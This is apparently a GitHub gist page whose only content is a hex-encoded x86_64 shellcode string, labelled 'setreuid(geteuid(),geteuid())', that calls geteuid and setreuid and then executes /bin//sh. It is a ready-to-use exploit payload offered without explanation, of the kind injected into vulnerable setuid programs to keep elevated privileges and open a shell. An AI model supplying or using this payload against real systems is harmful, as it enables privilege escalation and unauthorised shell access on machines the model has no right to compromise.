Skip to content

Instantly share code, notes, and snippets.

@austinschwartz
Created April 24, 2016 00:10
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save austinschwartz/37b039f511a28130915b773226d53506 to your computer and use it in GitHub Desktop.
Save austinschwartz/37b039f511a28130915b773226d53506 to your computer and use it in GitHub Desktop.
setreuid(geteuid(),geteuid())
x86_64 shellcode
\x48\x31\xc0\xb0\x6b\x0f\x05\x48\x89\xc7\x48\x89\xc6\x48\x31\xc0\xb0\x71\x0f\x05\x48\x31\xc0\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment